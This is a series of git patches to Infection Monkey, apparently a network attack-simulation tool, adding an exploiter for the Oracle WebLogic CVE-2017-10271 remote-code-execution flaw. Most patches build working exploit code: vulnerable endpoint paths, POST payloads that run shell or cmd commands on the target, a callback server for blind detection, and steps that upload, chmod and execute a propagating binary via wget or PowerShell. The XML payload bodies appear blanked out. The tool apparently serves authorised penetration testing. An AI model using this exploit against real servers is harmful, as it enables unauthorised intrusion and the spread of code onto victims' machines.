From ab64e78f00966fd3fc425e976add9bda387de64d Mon Sep 17 00:00:00 2001 From: Vakaris Date: Thu, 19 Jul 2018 14:15:18 +0300 Subject: [PATCH 01/10] Core functions of Oracle weblogic rce --- infection_monkey/config.py | 6 +- infection_monkey/example.conf | 6 +- infection_monkey/exploit/__init__.py | 1 + infection_monkey/exploit/weblogic.py | 203 ++++++++++++++++++ monkey_island/cc/services/config.py | 16 +- monkey_island/cc/services/report.py | 15 +- .../cc/ui/src/components/pages/ReportPage.js | 28 ++- 7 files changed, 264 insertions(+), 11 deletions(-) create mode 100644 infection_monkey/exploit/weblogic.py diff --git a/infection_monkey/config.py b/infection_monkey/config.py index 818bc75a0..b5df92f55 100644 --- a/infection_monkey/config.py +++ b/infection_monkey/config.py @@ -7,7 +7,7 @@ from abc import ABCMeta from itertools import product from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \ - SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter + SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger, \ MSSQLFinger @@ -149,7 +149,7 @@ class Configuration(object): finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger, MSSQLFinger] exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux - ElasticGroovyExploiter, Struts2Exploiter # multi + ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter # multi ] # how many victims to look for in a single scan iteration @@ -191,7 +191,7 @@ class Configuration(object): # TCP Scanner HTTP_PORTS = [80, 8080, 443, - 8008, # HTTP alternate + 8008, 7001 # HTTP alternate ] tcp_target_ports = [22, 2222, diff --git a/infection_monkey/example.conf b/infection_monkey/example.conf index 3c33d975a..1d6d4f0e9 100644 --- a/infection_monkey/example.conf +++ b/infection_monkey/example.conf @@ -37,7 +37,8 @@ "ShellShockExploiter", "ElasticGroovyExploiter", "SambaCryExploiter", - "Struts2Exploiter" + "Struts2Exploiter", + "WebLogicExploiter" ], "finger_classes": [ "SSHFinger", @@ -87,7 +88,8 @@ 443, 3306, 8008, - 9200 + 9200, + 7001 ], "timeout_between_iterations": 10, "use_file_logging": true, diff --git a/infection_monkey/exploit/__init__.py b/infection_monkey/exploit/__init__.py index f2d5d0c5b..346f6276b 100644 --- a/infection_monkey/exploit/__init__.py +++ b/infection_monkey/exploit/__init__.py @@ -42,3 +42,4 @@ from shellshock import ShellShockExploiter from sambacry import SambaCryExploiter from elasticgroovy import ElasticGroovyExploiter from struts2 import Struts2Exploiter +from weblogic import WebLogicExploiter diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py new file mode 100644 index 000000000..f4f034132 --- /dev/null +++ b/infection_monkey/exploit/weblogic.py @@ -0,0 +1,203 @@ +# Exploit based of: +# Kevin Kirsche (d3c3pt10n) +# https://github.com/kkirsche/CVE-2017-10271 +# and +# Luffin from Github +# https://github.com/Luffin/CVE-2017-10271 +# CVE: CVE-2017-10271 + +from requests import post, exceptions +from web_rce import WebRCE +from exploit.tools import get_free_tcp_port, get_interface_to_target +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD + +import threading +import logging +import copy +__author__ = "VakarisZ" + +LOG = logging.getLogger(__name__) +# How long server waits for response +DOWNLOAD_TIMEOUT = 4 +# How long to wait for a request to go to vuln machine and then to our server from there +REQUEST_TIMEOUT = 2 +# How long to wait for response in exploitation +EXECUTION_TIMEOUT = 15 +# Server might get response faster than it starts listening to it, we need a lock +LOCK = threading.Lock() +URLS = ["/wls-wsat/CoordinatorPortType", + "/wls-wsat/CoordinatorPortType11", + "/wls-wsat/ParticipantPortType", + "/wls-wsat/ParticipantPortType11", + "/wls-wsat/RegistrationPortTypeRPC", + "/wls-wsat/RegistrationPortTypeRPC11", + "/wls-wsat/RegistrationRequesterPortType", + "/wls-wsat/RegistrationRequesterPortType11"] +# Malicious request's headers: +HEADERS = { + "Content-Type": "text/xml;charset=UTF-8", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) " + "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" + } + + +class WebLogicExploiter(WebRCE): + _TARGET_OS_TYPE = ['linux', 'windows'] + + def __init__(self, host): + super(WebLogicExploiter, self).__init__(host) + + def exploit_host(self): + # Get open ports + ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) + if not ports: + return False + # Get urls to try to exploit + urls = WebRCE.build_potential_urls(self.host, ports, URLS) + + exploiter = self.exploit + + # Checking takes a lot of time, so we check until we get exploitable url and stop + vulnerable_urls = [] + for url in urls: + # Get full URL + if self.test_exploit(url): + vulnerable_urls.append(url) + break + self._exploit_info['vulnerable_urls'] = vulnerable_urls + if not vulnerable_urls: + return False + + # Somehow we can't save files outside server's directory + config = copy.deepcopy(self._config) + config.dropper_target_path_win_32 = 'monkey-32.exe' + config.dropper_target_path_win_64 = 'monkey-64.exe' + config.dropper_target_path_linux = './monkey.sh' + + data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], + {'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, + 'linux': WGET_HTTP_UPLOAD}) + + # We can't use 'if not' because response may be '' + if not data or data['response'] == False: + return False + + if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + return False + + if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False: + return False + + return True + + def exploit(self, url, command): + empty_payload = ''' + + + + + + + {cmd_base} + + + {cmd_opt} + + + {cmd_payload} + + + + + + + + + + ''' + if 'linux' in self.host.os['type']: + cmd_base = '/bin/sh' + cmd_opt = '-c' + command += ' 1> /dev/null 2> /dev/null' + else: + cmd_base = 'cmd' + cmd_opt = '/c' + command += ' 1> NUL 2> NUL' + + payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) + try: + post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) + except Exception as e: + print('[!] Connection Error') + print(e) + return True + + class HTTPServer(threading.Thread): + """ + Http server built to wait for GET requests. Because oracle web logic vuln is blind, + we determine if we can exploit by either getting a GET request from host or not. + """ + def __init__(self, local_ip, local_port, max_requests=1): + self._local_ip = local_ip + self._local_port = local_port + self.get_requests = 0 + self.max_requests = max_requests + self._stopped = False + threading.Thread.__init__(self) + + def run(self): + class S(BaseHTTPRequestHandler): + @staticmethod + def do_GET(): + LOG.info('Server received a request from vulnerable machine') + self.get_requests += 1 + LOG.info('Server waiting for exploited machine request...') + httpd = HTTPServer((self._local_ip, self._local_port), S) + httpd.daemon = True + LOCK.release() + while not self._stopped and self.get_requests < self.max_requests: + httpd.handle_request() + + self._stopped = True + return httpd + + def test_exploit(self, url): + local_port = get_free_tcp_port() + local_ip = get_interface_to_target(self.host.ip_addr) + httpd = WebLogicExploiter.HTTPServer(local_ip, local_port) + httpd.daemon = True + LOCK.acquire() + httpd.start() + LOCK.acquire() + generic_check_payload = ''' + + + + + http://{lhost}:{lport} + + + + + + + + + + ''' + payload = generic_check_payload.format(lhost=local_ip, lport=local_port) + try: + post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) + except exceptions.ReadTimeout: + pass + except Exception as e: + LOG.error("Something went wrong: %s" % e) + + LOCK.release() + httpd.join(DOWNLOAD_TIMEOUT) + if httpd.get_requests > 0: + exploited = True + else: + exploited = False + return exploited diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py index 8781f2b21..16c7502f1 100644 --- a/monkey_island/cc/services/config.py +++ b/monkey_island/cc/services/config.py @@ -86,6 +86,13 @@ SCHEMA = { "Struts2Exploiter" ], "title": "Struts2 Exploiter" + }, + { + "type": "string", + "enum": [ + "WebLogicExploiter" + ], + "title": "Oracle Web Logic Exploiter" } ] }, @@ -626,7 +633,8 @@ SCHEMA = { "ShellShockExploiter", "SambaCryExploiter", "ElasticGroovyExploiter", - "Struts2Exploiter" + "Struts2Exploiter", + "WebLogicExploiter" ], "description": "Determines which exploits to use. " + WARNING_SIGN @@ -761,7 +769,8 @@ SCHEMA = { 80, 8080, 443, - 8008 + 8008, + 7001 ], "description": "List of ports the monkey will check if are being used for HTTP" }, @@ -783,7 +792,8 @@ SCHEMA = { 443, 8008, 3306, - 9200 + 9200, + 7001 ], "description": "List of TCP ports the monkey will check whether they're open" }, diff --git a/monkey_island/cc/services/report.py b/monkey_island/cc/services/report.py index 369b29c25..f8647e81e 100644 --- a/monkey_island/cc/services/report.py +++ b/monkey_island/cc/services/report.py @@ -30,7 +30,8 @@ class ReportService: 'ElasticGroovyExploiter': 'Elastic Groovy Exploiter', 'Ms08_067_Exploiter': 'Conficker Exploiter', 'ShellShockExploiter': 'ShellShock Exploiter', - 'Struts2Exploiter': 'Struts2 Exploiter' + 'Struts2Exploiter': 'Struts2 Exploiter', + 'WebLogicExploiter': 'Oracle WebLogic exploiter' } class ISSUES_DICT(Enum): @@ -43,6 +44,7 @@ class ReportService: AZURE = 6 STOLEN_SSH_KEYS = 7 STRUTS2 = 8 + WEBLOGIC = 9 class WARNINGS_DICT(Enum): CROSS_SEGMENT = 0 @@ -298,6 +300,12 @@ class ReportService: processed_exploit['type'] = 'struts2' return processed_exploit + @staticmethod + def process_weblogic_exploit(exploit): + processed_exploit = ReportService.process_general_exploit(exploit) + processed_exploit['type'] = 'weblogic' + return processed_exploit + @staticmethod def process_exploit(exploit): exploiter_type = exploit['data']['exploiter'] @@ -310,7 +318,8 @@ class ReportService: 'ElasticGroovyExploiter': ReportService.process_elastic_exploit, 'Ms08_067_Exploiter': ReportService.process_conficker_exploit, 'ShellShockExploiter': ReportService.process_shellshock_exploit, - 'Struts2Exploiter': ReportService.process_struts2_exploit + 'Struts2Exploiter': ReportService.process_struts2_exploit, + 'WebLogicExploiter': ReportService.process_weblogic_exploit } return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit) @@ -430,6 +439,8 @@ class ReportService: issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True elif issue['type'] == 'struts2': issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True + elif issue['type'] == 'weblogic': + issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ issue['username'] in config_users or issue['type'] == 'ssh': issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True diff --git a/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey_island/cc/ui/src/components/pages/ReportPage.js index 2a02a092d..ac796af61 100644 --- a/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -24,7 +24,8 @@ class ReportPageComponent extends AuthComponent { CONFICKER: 5, AZURE: 6, STOLEN_SSH_KEYS: 7, - STRUTS2: 8 + STRUTS2: 8, + WEBLOGIC: 9 }; Warning = @@ -326,6 +327,10 @@ class ReportPageComponent extends AuthComponent {
  • Struts2 servers are vulnerable to remote code execution. ( CVE-2017-5638)
    • : null } + {this.state.report.overview.issues[this.Issue.WEBLOGIC] ? +
  • Oracle WebLogic servers are vulnerable to remote code execution. ( + CVE-2017-10271)
    • : null } : @@ -693,6 +698,24 @@ class ReportPageComponent extends AuthComponent { ); } + generateWebLogicIssue(issue) { + return ( +
  • + Install Oracle + critical patch updates. Or change server version. Vulnerable versions are + 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. + + Oracle WebLogic server at {issue.machine} ({issue.ip_address}) is vulnerable to remote code execution attack. +
    + The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware + (subcomponent: WLS Security). +     +
    • + ); + } + generateIssue = (issue) => { @@ -743,6 +766,9 @@ class ReportPageComponent extends AuthComponent { case 'struts2': data = this.generateStruts2Issue(issue); break; + case 'weblogic': + data = this.generateWebLogicIssue(issue); + break; } return data; }; From 66bc852742fc1e9eb5e3cf1dfcdedf9240ffd4e4 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 7 Aug 2018 15:09:36 +0300 Subject: [PATCH 02/10] Bugfix: http servers thread is stopped if remote target is not vulnerable --- infection_monkey/exploit/weblogic.py | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index f4f034132..524d9a005 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -18,8 +18,8 @@ import copy __author__ = "VakarisZ" LOG = logging.getLogger(__name__) -# How long server waits for response -DOWNLOAD_TIMEOUT = 4 +# How long server waits for get request +SERVER_TIMEOUT = 4 # How long to wait for a request to go to vuln machine and then to our server from there REQUEST_TIMEOUT = 2 # How long to wait for response in exploitation @@ -162,6 +162,10 @@ class WebLogicExploiter(WebRCE): self._stopped = True return httpd + def stop(self): + self._stopped = True + return + def test_exploit(self, url): local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) @@ -195,7 +199,8 @@ class WebLogicExploiter(WebRCE): LOG.error("Something went wrong: %s" % e) LOCK.release() - httpd.join(DOWNLOAD_TIMEOUT) + httpd.join(SERVER_TIMEOUT) + httpd.stop() if httpd.get_requests > 0: exploited = True else: From 10528c313dfad0fa8fe26e17edff0ab663670da9 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 17 Aug 2018 13:46:14 +0300 Subject: [PATCH 03/10] Webblogic refactored to web RCE framework changes(from static methods into class methods) --- infection_monkey/exploit/weblogic.py | 28 ++++++++++------------------ 1 file changed, 10 insertions(+), 18 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 524d9a005..c2b6e81a9 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -10,7 +10,7 @@ from requests import post, exceptions from web_rce import WebRCE from exploit.tools import get_free_tcp_port, get_interface_to_target from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD +from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD import threading import logging @@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE): _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): - super(WebLogicExploiter, self).__init__(host) + super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh', + 'win32': 'monkey-32.exe', + 'win64': 'monkey-64.exe'}) def exploit_host(self): # Get open ports - ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) + ports = self.get_ports_w(self.HTTP, ["http"]) if not ports: return False # Get urls to try to exploit - urls = WebRCE.build_potential_urls(self.host, ports, URLS) - - exploiter = self.exploit + urls = self.build_potential_urls(ports, URLS) # Checking takes a lot of time, so we check until we get exploitable url and stop vulnerable_urls = [] @@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE): if not vulnerable_urls: return False - # Somehow we can't save files outside server's directory - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = 'monkey-32.exe' - config.dropper_target_path_win_64 = 'monkey-64.exe' - config.dropper_target_path_linux = './monkey.sh' - - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], - {'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, - 'linux': WGET_HTTP_UPLOAD}) + data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}) # We can't use 'if not' because response may be '' - if not data or data['response'] == False: + if not data or data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False: return False return True From 8fd42abd5d7e42a2553dcead47948211295a1651 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 22 Aug 2018 19:00:14 +0300 Subject: [PATCH 04/10] Refactored according to final web_rce framework changes --- infection_monkey/exploit/weblogic.py | 40 +++++----------------------- 1 file changed, 7 insertions(+), 33 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index c2b6e81a9..4ea80c1d4 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE): 'win32': 'monkey-32.exe', 'win64': 'monkey-64.exe'}) - def exploit_host(self): - # Get open ports - ports = self.get_ports_w(self.HTTP, ["http"]) - if not ports: - return False - # Get urls to try to exploit - urls = self.build_potential_urls(ports, URLS) - - # Checking takes a lot of time, so we check until we get exploitable url and stop - vulnerable_urls = [] - for url in urls: - # Get full URL - if self.test_exploit(url): - vulnerable_urls.append(url) - break - self._exploit_info['vulnerable_urls'] = vulnerable_urls - if not vulnerable_urls: - return False - - data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}) - - # We can't use 'if not' because response may be '' - if not data or data['response'] is False: - return False - - if self.change_permissions(vulnerable_urls[0], data['path']) is False: - return False - - if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False: - return False - - return True + def get_exploit_config(self): + exploit_config = super(WebLogicExploiter, self).get_exploit_config() + exploit_config['blind_exploit'] = True + exploit_config['stop_checking_urls'] = True + exploit_config['url_extensions'] = URLS + return exploit_config def exploit(self, url, command): empty_payload = ''' @@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE): self._stopped = True return - def test_exploit(self, url): + def check_if_exploitable(self, url): local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) httpd = WebLogicExploiter.HTTPServer(local_ip, local_port) From 8e8422b3b7c4019f20b43e2f02a6b2a20d57dca3 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Thu, 23 Aug 2018 13:58:11 +0300 Subject: [PATCH 05/10] Lock changed from singleton into local variable --- infection_monkey/exploit/weblogic.py | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 4ea80c1d4..f8db585a5 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -24,8 +24,6 @@ SERVER_TIMEOUT = 4 REQUEST_TIMEOUT = 2 # How long to wait for response in exploitation EXECUTION_TIMEOUT = 15 -# Server might get response faster than it starts listening to it, we need a lock -LOCK = threading.Lock() URLS = ["/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType11", "/wls-wsat/ParticipantPortType", @@ -133,13 +131,15 @@ class WebLogicExploiter(WebRCE): return def check_if_exploitable(self, url): + # Server might get response faster than it starts listening to it, we need a lock + lock = threading.Lock() local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) httpd = WebLogicExploiter.HTTPServer(local_ip, local_port) httpd.daemon = True - LOCK.acquire() + lock.acquire() httpd.start() - LOCK.acquire() + lock.acquire() generic_check_payload = ''' @@ -164,7 +164,7 @@ class WebLogicExploiter(WebRCE): except Exception as e: LOG.error("Something went wrong: %s" % e) - LOCK.release() + lock.release() httpd.join(SERVER_TIMEOUT) httpd.stop() if httpd.get_requests > 0: From f001403a9282bf6b3d36dedefaefeaaff3f33f77 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Thu, 23 Aug 2018 14:35:45 +0300 Subject: [PATCH 06/10] Fixed lock bug and made uploaded monkey names standard --- infection_monkey/exploit/weblogic.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index f8db585a5..113a63046 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -45,8 +45,8 @@ class WebLogicExploiter(WebRCE): def __init__(self, host): super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh', - 'win32': 'monkey-32.exe', - 'win64': 'monkey-64.exe'}) + 'win32': 'monkey32.exe', + 'win64': 'monkey64.exe'}) def get_exploit_config(self): exploit_config = super(WebLogicExploiter, self).get_exploit_config() @@ -102,12 +102,13 @@ class WebLogicExploiter(WebRCE): Http server built to wait for GET requests. Because oracle web logic vuln is blind, we determine if we can exploit by either getting a GET request from host or not. """ - def __init__(self, local_ip, local_port, max_requests=1): + def __init__(self, local_ip, local_port, lock, max_requests=1): self._local_ip = local_ip self._local_port = local_port self.get_requests = 0 self.max_requests = max_requests self._stopped = False + self.lock = lock threading.Thread.__init__(self) def run(self): @@ -119,7 +120,7 @@ class WebLogicExploiter(WebRCE): LOG.info('Server waiting for exploited machine request...') httpd = HTTPServer((self._local_ip, self._local_port), S) httpd.daemon = True - LOCK.release() + self.lock.release() while not self._stopped and self.get_requests < self.max_requests: httpd.handle_request() @@ -135,7 +136,7 @@ class WebLogicExploiter(WebRCE): lock = threading.Lock() local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) - httpd = WebLogicExploiter.HTTPServer(local_ip, local_port) + httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock) httpd.daemon = True lock.acquire() httpd.start() From 39bb41ed25a1ab950063b5520e9cda65e1c042bc Mon Sep 17 00:00:00 2001 From: Vakaris Date: Thu, 23 Aug 2018 16:03:55 +0300 Subject: [PATCH 07/10] Removed unused imports and tested --- infection_monkey/exploit/weblogic.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 113a63046..bd6cbc777 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -10,11 +10,10 @@ from requests import post, exceptions from web_rce import WebRCE from exploit.tools import get_free_tcp_port, get_interface_to_target from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD import threading import logging -import copy + __author__ = "VakarisZ" LOG = logging.getLogger(__name__) From 307a7c396c70f72cd2a35a2bdfdb8f2deaa8d11a Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 25 Aug 2018 17:56:43 +0300 Subject: [PATCH 08/10] Notes fixed and tested --- infection_monkey/config.py | 3 +- infection_monkey/exploit/weblogic.py | 141 ++++++++++++++------------- 2 files changed, 77 insertions(+), 67 deletions(-) diff --git a/infection_monkey/config.py b/infection_monkey/config.py index b5df92f55..f8094817c 100644 --- a/infection_monkey/config.py +++ b/infection_monkey/config.py @@ -191,7 +191,8 @@ class Configuration(object): # TCP Scanner HTTP_PORTS = [80, 8080, 443, - 8008, 7001 # HTTP alternate + 8008, # HTTP alternate + 7001 # Oracle Weblogic default server port ] tcp_target_ports = [22, 2222, diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index bd6cbc777..4169bb537 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -17,11 +17,11 @@ import logging __author__ = "VakarisZ" LOG = logging.getLogger(__name__) -# How long server waits for get request +# How long server waits for get request in seconds SERVER_TIMEOUT = 4 -# How long to wait for a request to go to vuln machine and then to our server from there +# How long to wait for a request to go to vuln machine and then to our server from there. In seconds REQUEST_TIMEOUT = 2 -# How long to wait for response in exploitation +# How long to wait for response in exploitation. In seconds EXECUTION_TIMEOUT = 15 URLS = ["/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType11", @@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE): return exploit_config def exploit(self, url, command): - empty_payload = ''' - - - - - - - {cmd_base} - - - {cmd_opt} - - - {cmd_payload} - - - - - - - - - - ''' if 'linux' in self.host.os['type']: - cmd_base = '/bin/sh' - cmd_opt = '-c' - command += ' 1> /dev/null 2> /dev/null' + payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') else: - cmd_base = 'cmd' - cmd_opt = '/c' - command += ' 1> NUL 2> NUL' - - payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) + payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') try: post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) except Exception as e: @@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE): print(e) return True - class HTTPServer(threading.Thread): + class IndicationHTTPServer(threading.Thread): """ Http server built to wait for GET requests. Because oracle web logic vuln is blind, we determine if we can exploit by either getting a GET request from host or not. @@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE): self._stopped = False self.lock = lock threading.Thread.__init__(self) + self.daemon = True def run(self): class S(BaseHTTPRequestHandler): @@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE): def check_if_exploitable(self, url): # Server might get response faster than it starts listening to it, we need a lock - lock = threading.Lock() - local_port = get_free_tcp_port() - local_ip = get_interface_to_target(self.host.ip_addr) - httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock) - httpd.daemon = True - lock.acquire() - httpd.start() - lock.acquire() - generic_check_payload = ''' - - - - - http://{lhost}:{lport} - - - - - - - - - - ''' - payload = generic_check_payload.format(lhost=local_ip, lport=local_port) + httpd, lock = self._start_http_server() + payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port) try: post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) except exceptions.ReadTimeout: + # Our request does not get response thus we get ReadTimeout error pass except Exception as e: LOG.error("Something went wrong: %s" % e) + self._stop_http_server(httpd, lock) + return httpd.get_requests > 0 + def _start_http_server(self): + lock = threading.Lock() + local_port = get_free_tcp_port() + local_ip = get_interface_to_target(self.host.ip_addr) + httpd = self.IndicationHTTPServer(local_ip, local_port, lock) + lock.acquire() + httpd.start() + lock.acquire() + return httpd, lock + + def _stop_http_server(self, httpd, lock): lock.release() httpd.join(SERVER_TIMEOUT) httpd.stop() - if httpd.get_requests > 0: - exploited = True - else: - exploited = False - return exploited + return True + + + @staticmethod + def exploit_payload(cmd_base, cmd_opt, command): + empty_payload = ''' + + + + + + + {cmd_base} + + + {cmd_opt} + + + {cmd_payload} + + + + + + + + + + ''' + payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) + return payload + + @staticmethod + def test_payload(ip, port): + generic_check_payload = ''' + + + + + http://{host}:{port} + + + + + + + + + + ''' + payload = generic_check_payload.format(host=ip, port=port) + return payload From 57e795573e1e5bbdd4524b02f705931d29d86296 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 28 Aug 2018 22:37:07 +0300 Subject: [PATCH 09/10] Documented what's required and other minor changes --- infection_monkey/exploit/weblogic.py | 30 ++++++++++++++++++++-------- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 4169bb537..68ea9f5f2 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -56,9 +56,9 @@ class WebLogicExploiter(WebRCE): def exploit(self, url, command): if 'linux' in self.host.os['type']: - payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') + payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') else: - payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') + payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') try: post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) except Exception as e: @@ -99,12 +99,11 @@ class WebLogicExploiter(WebRCE): def stop(self): self._stopped = True - return def check_if_exploitable(self, url): # Server might get response faster than it starts listening to it, we need a lock httpd, lock = self._start_http_server() - payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port) + payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) try: post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) except exceptions.ReadTimeout: @@ -116,6 +115,10 @@ class WebLogicExploiter(WebRCE): return httpd.get_requests > 0 def _start_http_server(self): + """ + Starts custom http server that waits for GET requests + :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock) + """ lock = threading.Lock() local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) @@ -129,11 +132,16 @@ class WebLogicExploiter(WebRCE): lock.release() httpd.join(SERVER_TIMEOUT) httpd.stop() - return True - @staticmethod - def exploit_payload(cmd_base, cmd_opt, command): + def get_exploit_payload(cmd_base, cmd_opt, command): + """ + Formats the payload used in exploiting weblogic servers + :param cmd_base: What command prompt to use eg. cmd + :param cmd_opt: cmd_base commands parameters. eg. /c (to run command) + :param command: command itself + :return: Formatted payload + """ empty_payload = ''' @@ -162,7 +170,13 @@ class WebLogicExploiter(WebRCE): return payload @staticmethod - def test_payload(ip, port): + def get_test_payload(ip, port): + """ + Gets payload used for testing whether weblogic server is vulnerable + :param ip: Server's IP + :param port: Server's port + :return: Formatted payload + """ generic_check_payload = ''' From 3f809403d1754b1144ab745405b54bb896d45b34 Mon Sep 17 00:00:00 2001 From: 